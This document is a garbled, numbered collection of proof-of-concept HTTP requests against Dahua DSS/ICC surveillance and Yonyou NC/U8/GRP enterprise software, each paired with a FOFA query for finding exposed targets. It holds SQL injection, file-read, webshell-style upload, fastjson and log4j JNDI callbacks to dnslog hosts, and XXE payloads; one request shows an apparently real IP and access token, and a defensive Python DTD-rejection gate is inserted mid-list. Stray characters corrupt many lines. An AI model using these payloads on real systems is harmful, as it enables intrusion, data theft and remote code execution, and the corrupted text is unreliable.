7 Y4 D" t; p  JGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
  ?; f6 f& Q5 K, R  ZHost: x.x.x.x3 a# O5 N) x; b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
6 a' Z6 V# z- d5 Y# |3 H5 @! kConnection: close; x4 f! h5 g9 I4 j/ O
Accept: */*- h: K" k( F  ^* B1 \! `' d
Accept-Language: en
4 L0 Q+ I6 n* a1 ?$ p# yAccept-Encoding: gzip/ t9 d, k  l3 I  h+ N/ z3 ^

: _0 s8 a( A+ ?  @& ~9 Q. M0 P! L. k3 M
17. 大华 DSS itcBulletin SQL 注入
0 S2 e7 b- x1 c, SFOFA:app="dahua-DSS"
; C/ g7 M& m5 z& ]POST /portal/services/itcBulletin?wsdl HTTP/1.1
( g" b- u; Q' THost: x.x.x.x
/ p$ z$ u( ?4 n3 k8 P* l' DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, |5 W8 U+ a( y
Connection: close& B- j7 ^3 a' c9 I6 P
Content-Length: 345
" k: q5 N% m& A! S% Z6 KAccept-Encoding: gzip2 e' P8 n& `  W* H9 n4 E
8 C2 K8 Z5 O5 m+ x1 S0 t) @% w2 g
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
' \' }" G9 \: s" @: Y<s11:Body>
, u* K3 P: {' q0 a/ x9 }6 ^! i    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>$ q* x- w: T1 ]) y- z% ?, i
      <netMarkings>
$ o1 u4 H1 t5 n       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" u- t4 I3 M% ^* M: x      </netMarkings>
9 f& @* d8 X7 M$ n: b    </ns1:deleteBulletin>* R3 ?, n! |9 v
  </s11:Body>5 g$ X3 ?9 K+ f9 R% m" v+ b+ l
</s11:Envelope>& T$ r# d) U: L: P# r/ A
/ R& {  q+ J8 c
4 h4 }+ \5 Z  Z3 D- P; Q# [
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( Z6 h. w' |& h. ?% V- ]
FOFA:app="dahua-DSS"
( I( Z1 c& y8 U- zGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1( v0 g1 f2 y2 ~8 p! [4 c4 b1 D* [
Host: your-ip' G+ I- k. v, b3 Z0 M3 A2 F! e* @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, O! c$ Z) I# a: j3 ^8 V/ cAccept-Encoding: gzip, deflate: O) w7 Z+ t+ C
Accept: */*5 }/ }% h# A9 A, b7 ^& M
Connection: keep-alive
& {! O# E0 s* Q3 A: _0 W. \3 R* `
8 J7 T8 n/ j& c8 k7 K9 q2 A

$ e: o% a6 x( ~6 T% S19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入- S$ s. P3 a5 |1 c" B
FOFA:app="dahua-DSS"
# z2 {. b* Y1 BGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.19 V+ `0 `3 k7 A9 P
Host:
: S3 F9 R5 z% [7 vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 D1 l! v6 n6 z
Accept-Encoding: gzip, deflate
& p2 Y9 c' Q+ Q+ zAccept: */*
7 Q& G* c; I$ f% y& [Connection: keep-alive
  ~. R; B) W% p' ]+ E% s  V; D6 L
( I4 A$ c4 O/ O7 E7 k
) S, D* G; M2 t+ i/ L20. 大华ICC智能物联综合管理平台任意文件读取
* w2 L+ a: j2 @FOFA:body="*客户端会小于800*"
5 M1 i+ ~. j" S2 j/ T6 m. P3 g# hGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* _5 p+ x" W! x4 s: g
Host: x.x.x.x
+ e; u! N( o: J8 p& `* I! aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 G" y; ]) K/ BConnection: close. m  W  e9 u! V: ?
Accept: */*
/ P6 e( k! Y# m3 s8 x2 o* p9 E* _Accept-Language: en
3 z" q6 i9 d1 j. jAccept-Encoding: gzip
# n' i4 K) V9 M
$ ]0 V% R* x/ `* c( l! S3 \& ~8 m" Z
21. 大华ICC智能物联综合管理平台random远程代码执行7 n8 X3 r; a. o9 _, _3 t
FOFA:icon_hash="-1935899595"/ @& s) K% {( k* `
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& E/ x3 ^/ w" ?! R6 h
Host: x.x.x.x$ b# x2 i* {1 d# ^, h. p1 f% t* \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 D9 x& {0 S9 a$ h' n' C
Content-Length: 1616 s6 J& q* _( d& F
Accept-Encoding: gzip
3 x$ P& |, a2 K' UConnection: close8 {7 C, W* ~3 n5 V
Content-Type: application/json;charset=utf-8
& q; j& }4 i7 d, ]5 i8 \, R( W8 w
4 m0 k: P0 y5 X+ m{
; J' X7 Z5 r5 e* M"a":{- J5 z  W, G+ B) _, M- x
   "@type":"com.alibaba.fastjson.JSONObject",
8 X# ]2 G/ o1 }: k    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
6 Y1 \" T( t: `3 o  c8 c( C4 K  }""
) O. p" s6 G: u0 H* l) w}+ U' x# F6 C( [  N  O' V/ E
  U4 s$ B& k, u
- k: D8 Z/ H; [  A; S
22. 大华ICC智能物联综合管理平台 log4j远程代码执行! G0 v) G! L- s9 c3 d0 @5 G
FOFA:icon_hash="-1935899595"& c) u( G6 }: @& K1 m; e% q
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.16 d* E' d8 ~9 z# H+ G! h  A8 z  X
Host: your-ip
& C7 S: Z; U8 Z' o2 G+ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 f- w. e- o3 W$ U/ QContent-Type: application/json;charset=utf-8
; S$ V0 N& H3 y& W" F/ M  m4 p) n; r6 e5 i, a+ l
{
1 L% F) \4 n( Y1 l" N5 M- q* R"loginName":"${jndi:ldap://dnslog}"
9 N# f, q3 O* k$ P}& i+ A( {! ?* n) W: U' r! b4 G( n
% m/ W' d+ k. x3 g/ @+ ^

6 N& _  b# `9 t# ?, G" c9 a3 U+ b/ ^, v  L, d
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 x- p$ h# a) h9 \4 H
FOFA:icon_hash="-1935899595"; @4 n" r% [8 k. ?
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1  ?6 T8 L( ]  m! K2 d
Host: your-ip! }  z  ^1 q8 I* x* K* m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 S% h* T2 o; r5 {5 c4 t5 r
Content-Type: application/json;charset=utf-8- d9 u9 s, Y2 H4 b" `& R* e5 [
Accept-Encoding: gzip
3 f) N8 L- y" XConnection: close
' ~$ ^" }% J7 E9 `2 }* B3 L4 S3 Q* K7 Z$ T8 q& ^1 w7 ^
{/ B, Q7 r4 `! h3 x/ F
    "a":{
0 r  C+ {( W) ~9 f$ J        "@type":"com.alibaba.fastjson.JSONObject",& H# \) O8 y# g0 V
       {"@type":"java.net.URL","val":"http://DNSLOG"}9 ^4 ~, |( {- w. g5 R* Q. m# U( h
        }""9 W7 Q* Z* N7 w
}
; [# L  e  f+ ^/ \% N( X# M3 x/ b* C" w7 `8 A% D" {* ?( `+ s) p

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Then access:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Affected versions: <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Affected versions: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Affected versions: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Then access:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

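Added example for the XXE entries 36, 37, 38, 40 and 45 (Python; this is not code from the original post or from Yonyou): a DTD gate that runs on the raw text before any XML parser sees it. The sample inputs are constructed to mirror the three shapes those requests use, a raw XML body, XML carried in a URL-encoded form field (msg=, __xml=, reqData=), and a DOCTYPE nested inside a CDATA section of an otherwise clean SOAP envelope; hostnames in the samples are placeholders.

```python
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Any DOCTYPE or ENTITY declaration, in any case, anywhere in the text.
_DTD_RE = re.compile(r"<!\s*(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def form_field(body: str, name: str) -> str:
    """Extract one field from an application/x-www-form-urlencoded body (one decode layer)."""
    return urllib.parse.parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def has_dtd(xml_text: str) -> bool:
    """String-level check, applied before parsing.

    Because it reads the raw text it also sees a DOCTYPE inside a CDATA
    section (the IUpdateService shape): the outer parser treats CDATA content
    as opaque text and the backend only re-parses it later, so a check on the
    parsed outer document would pass it.
    """
    return _DTD_RE.search(xml_text) is not None


def parse_untrusted(xml_text: str) -> ET.Element:
    """Gate, then parse. Refusing every DTD also removes internal-entity expansion."""
    if has_dtd(xml_text):
        raise ValueError("DTD not allowed in untrusted XML")
    return ET.fromstring(xml_text)


# Constructed samples shaped like the PoCs above; example.invalid is a placeholder host.
SAMPLES = {
    "xchange_raw": '<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://example.invalid">]>'
                   '<r><a>&xxe;</a></r>',
    "soapformat_form": urllib.parse.urlencode({
        "msg": '<!DOCTYPE foo[<!ENTITY e SYSTEM "file:///C:/windows/win.ini">]>'
               '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
               '<soap:Body><soap:Fault><faultcode>soap:Server&e;</faultcode>'
               '</soap:Fault></soap:Body></soap:Envelope>'}),
    "iupdate_cdata": ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
                      'xmlns:iup="urn:x"><soapenv:Body><iup:getResult><iup:string><![CDATA['
                      '<!DOCTYPE x [<!ENTITY % a SYSTEM "http://example.invalid">%a;]><xxx/>'
                      ']]></iup:string></iup:getResult></soapenv:Body></soapenv:Envelope>'),
    "clean_soap": ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
                   '<soapenv:Body><ping>1</ping></soapenv:Body></soapenv:Envelope>'),
}


def classify(samples: dict) -> dict:
    """Return {name: 'rejected' | 'parsed'} per sample, unwrapping form bodies first."""
    out = {}
    for name, body in samples.items():
        xml_text = form_field(body, "msg") if name.endswith("_form") else body
        try:
            parse_untrusted(xml_text)
            out[name] = "parsed"
        except ValueError:
            out[name] = "rejected"
    return out


if __name__ == "__main__":
    for name, verdict in classify(SAMPLES).items():
        print(f"{name:16s} {verdict}")
```

The gate is deliberately blunt: none of the endpoints above has a legitimate reason to accept a DOCTYPE, and rejecting the whole DTD is simpler to audit than trying to permit internal entities while blocking external ones.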
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
